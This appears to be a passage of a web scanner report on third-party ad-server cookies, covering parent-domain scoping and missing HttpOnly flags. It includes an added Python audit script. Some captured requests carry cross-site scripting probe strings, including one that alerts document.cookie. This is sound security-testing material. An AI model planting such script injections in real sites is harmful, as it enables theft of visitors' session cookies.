Cookie: v=576462396875340721; ts=1/8/2011+3:06:08+AM; z=4; sid=9ceb3417-a6c7-439a-a223-e9ad8d9afb02; av1=c0596.66bcd=0114111510:b5d53.66348=0114111516; vcs0=vC0596:66BCD_0_0_0_2066CE_0_0|vB5D53:66348_0_0_0_2066D4_0_0

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache="Set-Cookie"
Pragma: no-cache
Content-Type: text/html
Expires: Sat, 29 Jan 2011 00:42:58 GMT
Server: Microsoft-IIS/7.0
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: ts=1/29/2011+12:42:58+AM; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Set-Cookie: z=4; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Set-Cookie: sid=92c5b080-0b3b-470a-b91d-cc22156a51a6; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Set-Cookie: vc=; domain=by.adshuffle.com; expires=Tue, 01-Jan-1980 06:00:00 GMT; path=/
Set-Cookie: av1=c0596.66bcd=0114111510:b5d53.66348=0114111516:51f37.6292a=0128111842; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Set-Cookie: vcs0=vC0596:66BCD_0_0_0_2066CE_0_0|vB5D53:66348_0_0_0_2066D4_0_0|v51F37:6292A_0_0_0_20B662_0_0; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Date: Sat, 29 Jan 2011 00:42:57 GMT
Content-Length: 43
Set-Cookie: NSC_betivggmf-opef=ffffffff0908150145525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 00:47:58 GMT;path=/

GIF89a.............!.......,...........D..;

10.139. http://voken.eyereturn.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://voken.eyereturn.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain (see the Domain attribute on the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /?233369&click=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000943794/cstr=758797=_4d43560a,8830366303,766159^943794^1183^0,1_/xsxdata=$xsxdata/bnum=758797/optn=64?trg=&params=8830366303 HTTP/1.1
Host: voken.eyereturn.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP NID PSAo PSDa OUR STP IND UNI COM NAV"
Set-Cookie: cmggl=1; Domain=.eyereturn.com; Expires=Sun, 27-Feb-2011 23:48:59 GMT; Path=/
Set-Cookie: er_guid=AB15549D-BD77-4F41-E5E1-E44D3AF016E4; Domain=.eyereturn.com; Expires=Sun, 27-Jan-2013 23:48:59 GMT; Path=/
Location: http://voken.eyereturn.com/pb/get?233369&click=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000943794/cstr=758797=_4d43560a,8830366303,766159^943794^1183^0,1_/xsxdata=$xsxdata/bnum=758797/optn=64?trg=&params=8830366303
Content-Length: 0
Date: Fri, 28 Jan 2011 23:48:58 GMT
Connection: close
Server: eyeReturn Ad Serveri 6


10.140. http://voken.eyereturn.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://voken.eyereturn.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain (see the Domain attribute on the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /?233374&click=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000943795/cstr=91575939=_4d4372e7,6205162343,766161^943795^1183^0,1_/xsxdata=$xsxdata/bnum=91575939/optn=64?trg=&params=6205162343 HTTP/1.1
Host: voken.eyereturn.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: erTok="AwAAAADLogMAlLcgAAEAAByjAwCUtyAAAQAAUX0DAJW3IAABAAA="; cmggl=1; er_guid=0253E4A4-2BB0-7708-5C00-B99AAC47FE39

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP NID PSAo PSDa OUR STP IND UNI COM NAV"
Set-Cookie: erTok="AwAAAADLogMAELggAAIAAByjAwCUtyAAAQAAUX0DAJW3IAABAAAgowMAELggAAEAAA=="; Domain=.eyereturn.com; Expires=Mon, 28-Jan-2013 01:52:40 GMT; Path=/
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Sat, 29 Jan 2011 01:52:40 GMT
Server: eyeReturn Ad Server
Content-Length: 14762

//<!CDATA[// Copyright eyeReturn Marketing Inc., 2011, All Rights Reserved //
er_CID='7054';er_SegID='233375';er_imgSrc='http://resources.eyereturn.com/7054/007054_polite_728x90_f_30_v1.swf';er_token
...[SNIP]...

10.141. http://voken.eyereturn.com/pb/get

Summary

Severity:   Information
Confidence:   Certain
Host:   http://voken.eyereturn.com
Path:   /pb/get

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain (see the Domain attribute on the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pb/get?233369&click=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000943794/cstr=758797=_4d43560a,8830366303,766159^943794^1183^0,1_/xsxdata=$xsxdata/bnum=758797/optn=64?trg=&params=8830366303 HTTP/1.1
Host: voken.eyereturn.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmggl=1; er_guid=AB15549D-BD77-4F41-E5E1-E44D3AF016E4

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP NID PSAo PSDa OUR STP IND UNI COM NAV"
Set-Cookie: erTok="AwAAAADLogMAlLcgAAEAAByjAwCUtyAAAQAA"; Domain=.eyereturn.com; Expires=Sun, 27-Jan-2013 23:48:59 GMT; Path=/
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Fri, 28 Jan 2011 23:48:58 GMT
Connection: close
Server: eyeReturn Ad Serveri 6
Content-Length: 14757

//<!CDATA[// Copyright eyeReturn Marketing Inc., 2011, All Rights Reserved //
er_CID='7054';er_SegID='233370';er_imgSrc='http://resources.eyereturn.com/7054/007054_polite_300x250_f_30_v1.swf';er_toke
...[SNIP]...

10.142. http://voken.eyereturn.com/pix

Summary

Severity:   Information
Confidence:   Certain
Host:   http://voken.eyereturn.com
Path:   /pix

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain (see the Domain attribute on the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pix?223686 HTTP/1.1
Host: voken.eyereturn.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmggl=1; er_guid=AB15549D-BD77-4F41-E5E1-E44D3AF016E4; erTok="AwAAAADLogMAlLcgAAEAAByjAwCUtyAAAQAA"

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP NID PSAo PSDa OUR STP IND UNI COM NAV"
Set-Cookie: erTok="AwAAAADLogMAlLcgAAEAAByjAwCUtyAAAQAAUX0DAJW3IAABAAA="; Domain=.eyereturn.com; Expires=Sun, 27-Jan-2013 23:49:09 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Fri, 28 Jan 2011 23:49:08 GMT
Connection: close
Server: eyeReturn Ad Serveri 6

GIF89a.............!...
...,...........L..;

10.143. http://xads.zedo.com/ads2/c

Summary

Severity:   Information
Confidence:   Certain
Host:   http://xads.zedo.com
Path:   /ads2/c

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain (see the DOMAIN attribute on the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ads2/c?a=853584;x=2304;g=172;c=1220000101,1220000101;i=0;n=1220;1=8;2=1;s=69;g=172;m=82;w=47;i=0;u=INmz6woBADYAAHrQ5V4AAACH~010411;p=6;f=990638;h=922865;k=http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/ HTTP/1.1
Host: xads.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Fri, 28 Jan 2011 15:06:31 GMT
Server: ZEDO 3G
Set-Cookie: FFgeo=5386156; path=/; EXPIRES=Sat, 28-Jan-12 15:06:31 GMT; DOMAIN=.zedo.com
Set-Cookie: ZFFbh=826-20110128,20|305_1;expires=Sat, 28 Jan 2012 15:06:31 GMT;DOMAIN=.zedo.com;path=/;
Set-Cookie: PCA922865=a853584Zc1220000101%2C1220000101Zs69Zi0Zt128; path=/; EXPIRES=Sun, 27-Feb-11 15:06:31 GMT; DOMAIN=.zedo.com
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Location: http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/
Vary: Accept-Encoding
Content-Length: 402
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://hpi.rotator.hadj7.adjuggler.net/servlet/
...[SNIP]...

11. Cookie without HttpOnly flag set
There are 577 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute in the relevant Set-Cookie header (for example, Set-Cookie: JSESSIONID=<value>; Path=/; HttpOnly).

You should be aware that the restrictions imposed by the HttpOnly flag can be circumvented in some circumstances (for example, an injected script can still read the cookie out of any response that echoes request headers back to the client, as in cross-site tracing via the TRACE method), and that numerous other serious attacks can be delivered by client-side script injection aside from simple cookie stealing: the injected script runs with the user's session whether or not it can read the cookie's value.
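As an added example, not part of this scanner report or of any vendor's code, the following Python audits raw HTTP responses like those captured above for both cookie findings on this page: a cookie scoped to a parent of the issuing domain (section 10) and a cookie issued without the HttpOnly flag (section 11). The session-token heuristic (matching well-known server session cookie names such as JSESSIONID and ASPSESSIONID*) is this example's own assumption, not the scanner's logic; the sample responses are constructed from the Set-Cookie headers shown in 10.139 and 11.3, plus a hardened variant that is the example's own.

```python
"""Audit captured HTTP responses for cookies scoped to a parent domain and
cookies set without HttpOnly (the two findings in sections 10 and 11)."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Heuristic (an assumption of this example): well-known server-side session
# cookie names count as session tokens and raise the risk of a finding.
SESSION_NAME_RE = re.compile(
    r"^(JSESSIONID|ASPSESSIONID\w*|ASP\.NET_SessionId|PHPSESSID|CFTOKEN|SESS\w*)$",
    re.I,
)


@dataclass
class Cookie:
    name: str
    value: str
    attrs: Dict[str, Optional[str]]  # lower-cased attribute -> value, None for bare flags


@dataclass
class Finding:
    cookie: str
    issue: str           # "missing HttpOnly" or "scoped to parent domain"
    session_token: bool  # True when the cookie name looks like a session id


def parse_set_cookie(header_value: str) -> Cookie:
    """Parse the text after 'Set-Cookie:' into name, value and attributes.
    Only the first '=' separates name from value, so values that themselves
    contain '=' or ':' (like the adshuffle av1/vcs0 cookies above) survive."""
    parts = [p.strip() for p in header_value.split(";")]
    name, _, value = parts[0].partition("=")
    attrs: Dict[str, Optional[str]] = {}
    for part in parts[1:]:
        if not part:
            continue  # tolerate a trailing ';' as in the ZEDO headers
        key, has_eq, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip() if has_eq else None
    return Cookie(name.strip(), value.strip(), attrs)


def is_parent_domain(host: str, domain: Optional[str]) -> bool:
    """True when the Domain attribute names a strict parent of the host that
    set the cookie, so every sibling host under that parent receives it too."""
    if not domain:
        return False  # no Domain attribute: the cookie is host-only
    domain = domain.lower().lstrip(".")
    host = host.lower()
    return host != domain and host.endswith("." + domain)


def audit_response(host: str, raw_response: str) -> List[Finding]:
    """Scan the header block of one raw HTTP response for both issues."""
    findings: List[Finding] = []
    for line in raw_response.splitlines():
        if not line.lower().startswith("set-cookie:"):
            continue
        cookie = parse_set_cookie(line.split(":", 1)[1])
        session = bool(SESSION_NAME_RE.match(cookie.name))
        if "httponly" not in cookie.attrs:
            findings.append(Finding(cookie.name, "missing HttpOnly", session))
        if is_parent_domain(host, cookie.attrs.get("domain")):
            findings.append(Finding(cookie.name, "scoped to parent domain", session))
    return findings


# Constructed samples: header lines taken from captures 11.3 and 10.139 above,
# plus a hardened variant (this example's own) with the flag added.
ADXPOSE_RESPONSE = """HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=FC8FA945550B733F43B55297886838C8; Path=/
Content-Type: text/javascript;charset=UTF-8
"""

EYERETURN_RESPONSE = """HTTP/1.1 302 Moved Temporarily
Set-Cookie: cmggl=1; Domain=.eyereturn.com; Expires=Sun, 27-Feb-2011 23:48:59 GMT; Path=/
Set-Cookie: er_guid=AB15549D-BD77-4F41-E5E1-E44D3AF016E4; Domain=.eyereturn.com; Expires=Sun, 27-Jan-2013 23:48:59 GMT; Path=/
Content-Length: 0
"""

HARDENED_RESPONSE = """HTTP/1.1 200 OK
Set-Cookie: JSESSIONID=FC8FA945550B733F43B55297886838C8; Path=/; HttpOnly
"""

if __name__ == "__main__":
    samples = [
        ("ads.adxpose.com", ADXPOSE_RESPONSE),
        ("voken.eyereturn.com", EYERETURN_RESPONSE),
        ("ads.adxpose.com", HARDENED_RESPONSE),
    ]
    for host, response in samples:
        for f in audit_response(host, response):
            tag = " (session token)" if f.session_token else ""
            print(f"{host}: {f.cookie}: {f.issue}{tag}")
```

The hardened sample shows the remediation in its simplest form: the same JSESSIONID header with HttpOnly appended. In practice the flag is set by the server's session machinery rather than by hand (Tomcat's useHttpOnly attribute on the Context element; ASP.NET's httpCookies httpOnlyCookies="true" setting in web.config), and an audit like this one is the regression check that the setting actually reached the wire.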



11.1. http://ad.doubleclick.net.57389.9231.302br.net/jsi/adi/N4682.132309.BURSTMEDIA/B4421704.7

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ad.doubleclick.net.57389.9231.302br.net
Path:   /jsi/adi/N4682.132309.BURSTMEDIA/B4421704.7

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (see the Set-Cookie header in the response below). The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jsi/adi/N4682.132309.BURSTMEDIA/B4421704.7;sz=300x250;click=http://www.burstnet.com/ads/ad19083a-map.cgi/BCPG174597.252798.300824/VTS=29iU7.jjkA/SZ=300X250A/V=2.3S//REDIRURL=;ord=3925? HTTP/1.1
Host: ad.doubleclick.net.57389.9231.302br.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=1B2A83185956BA19ABB6FE6E70A6C415; Path=/
Content-Type: text/html
Content-Length: 7169
Date: Fri, 28 Jan 2011 22:47:58 GMT
Connection: close

<html>
<head></head>
<body>
<script type="text/javascript"><!--

var adsafeVisParams = {
   mode : "jsi",
   jsref : "http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Midd
...[SNIP]...

11.2. http://ad.doubleclick.net.57390.9231.302br.net/jss/adj/N4682.132309.BURSTMEDIA/B4421704.7

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ad.doubleclick.net.57390.9231.302br.net
Path:   /jss/adj/N4682.132309.BURSTMEDIA/B4421704.7

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (see the Set-Cookie header in the response below). The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jss/adj/N4682.132309.BURSTMEDIA/B4421704.7 HTTP/1.1
Host: ad.doubleclick.net.57390.9231.302br.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=23121407506AF928BA0892656699F17B; Path=/
Content-Type: text/javascript
Content-Length: 6792
Date: Sat, 29 Jan 2011 05:20:26 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "null",
   adsafeSrc : "http://ad.doubleclick.net.57390.9231.302br.net/fw/adj/N4682.132309.BURSTMEDIA/B4421704.7",
   adsafeSep : "?",
   requrl : "",
   reqq
...[SNIP]...

11.3. http://ads.adxpose.com/ads/ads.js

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ads.adxpose.com
Path:   /ads/ads.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (see the Set-Cookie header in the response below). The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ads/ads.js?uid=7hSy8PbjRnOXSf2i_40364845 HTTP/1.1
Host: ads.adxpose.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00241B)%3C/script%3E
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=ddad3821-ec58-4641-be95-961ec5aac4d2

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=FC8FA945550B733F43B55297886838C8; Path=/
ETag: "0-gzip"
Cache-Control: must-revalidate, max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 28 Jan 2011 15:00:09 GMT
Connection: close

if(typeof __ADXPOSE_CONTAINERS__==="undefined"){__ADXPOSE_CONTAINERS__={}}if(typeof __ADXPOSE_EVENT_QUEUES__==="undefined"){__ADXPOSE_EVENT_QUEUES__={}}if(typeof __adxpose__getOffset__==="undefined"){
...[SNIP]...

11.4. http://ads.adxpose.com/ads/tag.js

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ads.adxpose.com
Path:   /ads/tag.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (see the Set-Cookie header in the response below). The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ads/tag.js?uid=M6uzDYEbWGBrvdnp_69537&cid=EI9-DR-Interclick&vchannel=12553&altbannerurl=http%253A%252F%252Fa1.interclick.com%252FgetInPage.aspx%253Fa%253D54%25252c55%2526b%253D12553%2526cid%253D1211388088786%2526isif%253Df%2526rurld%253Dwww.cbs6albany.com%2526sl%253Dtrue%2526dvp%253Dhttp%25253A%252F%252Fwww.cbs6albany.com%252Falbany-weather-forecast%25253Fdec0c%252527%2525253E%2525253Cscript%2525253Ealert%252528document.cookie%252529%2525253C%252Fscript%2525253E262a2c2a00e%25253D1%2526rurl%253Dhttp%25253A%25252F%25252Fburp%25252Fshow%25252F70%2526blkAdxp%253D1 HTTP/1.1
Host: ads.adxpose.com
Proxy-Connection: keep-alive
Referer: http://www.cbs6albany.com/albany-weather-forecast?dec0c'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E262a2c2a00e=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=ddad3821-ec58-4641-be95-961ec5aac4d2

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=DF1B104B3D685EBD40E943AD4EEF4B96; Path=/
Content-Type: text/javascript;charset=UTF-8
Content-Length: 845
Date: Sat, 29 Jan 2011 13:38:46 GMT
Connection: close

__ADXPOSE_PREFS__ = {"uid":"M6uzDYEbWGBrvdnp_69537","altbannerurl":"http%3A%2F%2Fa1.interclick.com%2FgetInPage.aspx%3Fa%3D54%252c55%26b%3D12553%26cid%3D1211388088786%26isif%3Df%26rurld%3Dwww.cbs6alban
...[SNIP]...

11.5. http://ads2.adbrite.com/favicon.ico

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ads2.adbrite.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (see the Set-Cookie header in the response below). The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: ads2.adbrite.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=168362173x0.688+1294536261x899753879; cv=1%3Aq1ZyLi0uyc91zUtWslIySyktr0nPLLDMMi8zrjGwMswuNjMusjK0MlCqBQA%3D; ut=1%3Aq1YqM1KyqlbKTq0szy9KKVayUsotTzQprDHMLja3sKwxrTE0z9dJzsiwSC%2BoysmrMczJSS%2BqqjGsMYAJZuUgCSrpKCUl5uWlFmWCjVKqrQUA; vsd="0@1@4d430048@searchportal.information.com"; rb="0:712156:20822400:6ch47d7o8wtv:0:742697:20828160:3011330574290390485:0:753292:20858400:CA-00000000456885722:0:762701:20861280:D8DB51BF08484217F5D14AB47F4002AD:0:806205:20861280:21d8e954-2b06-11e0-8e8a-0025900870d2:0"; srh=1%3Aq64FAA%3D%3D

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=61FCC3DEA075A87386A0EA6878423D23; Path=/
Location: http://bounce.adbrite.com/
Content-Type: text/html
Date: Sat, 29 Jan 2011 14:20:55 GMT
Connection: close


11.6. http://base.liveperson.net/visitor/addons/deploy.asp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://base.liveperson.net
Path:   /visitor/addons/deploy.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (see the Set-Cookie header in the response below). The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /visitor/addons/deploy.asp?site=5296924&d_id=1 HTTP/1.1
Host: base.liveperson.net
Proxy-Connection: keep-alive
Referer: http://solutions.liveperson.com/live-chat/C1/?utm_source=bing&utm_medium=cpc&utm_keyword=live%20chat&utm_campaign=chat%20-us
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=16101423669632,d=1294435351

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 14:03:34 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-type: application/x-javascript
max-age: 1800
Last-Modified: Fri, 07 Jan 2011 16:10:14 GMT
Content-Length: 16698
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQQRSRACD=EJCEGDPBIPCHGMBALKMGHIFF; path=/
Cache-control: public

lpAddMonitorTag();
//DO NOT CHANGE THE BELOW COMMENT
//PLUGINS_LIST=globalUtils,inputboxHandler
if (typeof(lpMTagConfig.plugins)=='undefined') { lpMTagConfig.plugins = {};}

lpMTagConfig.plugins[
...[SNIP]...

11.7. http://base.liveperson.net/visitor/addons/deploy.asp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://base.liveperson.net
Path:   /visitor/addons/deploy.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (see the Set-Cookie header in the response below). The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /visitor/addons/deploy.asp?site=5296924&d_id=1 HTTP/1.1
Host: base.liveperson.net
Proxy-Connection: keep-alive
Referer: http://solutions.liveperson.com/live-chat/C1/?utm_source=bing&utm_medium=cpc&utm_keyword=live%20chat&utm_campaign=chat%20-us
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=16101423669632,d=1294435351

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 13:59:11 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-type: application/x-javascript
max-age: 1800
Last-Modified: Fri, 07 Jan 2011 16:10:14 GMT
Content-Length: 16698
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCCQTSCAT=MAKLFIOAFLPGILKCPJFPHGPG; path=/
Cache-control: public

lpAddMonitorTag();
//DO NOT CHANGE THE BELOW COMMENT
//PLUGINS_LIST=globalUtils,inputboxHandler
if (typeof(lpMTagConfig.plugins)=='undefined') { lpMTagConfig.plugins = {};}

lpMTagConfig.plugins[
...[SNIP]...

11.8. http://boston30.autochooser.com/results.asp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://boston30.autochooser.com
Path:   /results.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set (see the Set-Cookie headers in the response below). One of these cookies appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /results.asp?gid=0&pagename=dealersearch.asp&resulttype=2&postto=results.asp HTTP/1.1
Host: boston30.autochooser.com
Accept: */*
Accept-Language: en
